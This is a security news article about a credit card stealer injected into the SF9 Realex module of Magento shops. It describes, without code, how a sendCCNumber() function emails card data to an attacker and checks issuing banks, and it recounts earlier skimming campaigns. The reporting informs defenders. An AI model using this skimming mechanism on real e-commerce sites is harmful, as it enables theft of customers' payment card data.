It is a continuing battle for e-commerce sites designed using the Magento platform because of continuous attacks. Security researchers have stumbled across a malicious function inside the platform’s module that steals credit card information.
PHP files were injected with code for SF9 Realex, which is a module that helps sites store customer credit card data for one-click checkouts for repeat customers. It reacts with the Realex RalAuth remote and Redirect systems. This is a very popular solution in the Magento community. This malicious function has been found by Bruno Zanelato from security firm Sucuri.
The malicious function sendCCNumber() reroutes credit card information inputted by a customer from Magento to an attacker’s email address which has been sneaked inside a variable later in the code. The data which is encoded in JSON arrives in the attacker’s inbox without the victim being any the wiser.
The attacker uses binlist.net, a public web service for searching issuer identification number (IIN) which helps identify which bank each card is associated with.
Attackers will definitely get bolder in targeting credit card data with e-commerce platforms such as Magento.
This trend is on the rise, and specifically targeting Magento, which in turn can affect any e-commerce platform in the future.
There wasn’t a vulnerability in Magento that enabled stealing credit card data as pointed out by Zanelato. However, the attacker was able to exploit a different unnamed vulnerability in the website where the e-commerce platform is hosted which eventually let the attacker inject malicious script and takeover SF9 Realex.
It has been said that this is the latest in a line of credit card stealers which Sucuri researchers have observed taking advantage of Magento.
Last summer Cesar Anjos, a researcher with the firm looked at one stealer that was loaded from another source. The stealer essentially performed a man-in-the-middle attack between the user and the checkout page after credit card information was entered. Last October, Ben Martin, a different researcher with the firm, discovered attackers scraping credit card numbers and exfiltrating them in obscure, sometimes publicly viewable image files.
Researchers with RiskIQ monitored attacks similar to ones described by Sucuri last year. The firm said the attacks it had been monitoring originated from a single hacking group targeting e-commerce platforms such as Powerfront CMS and OpenCart with a web-based keylogger in March 2016.
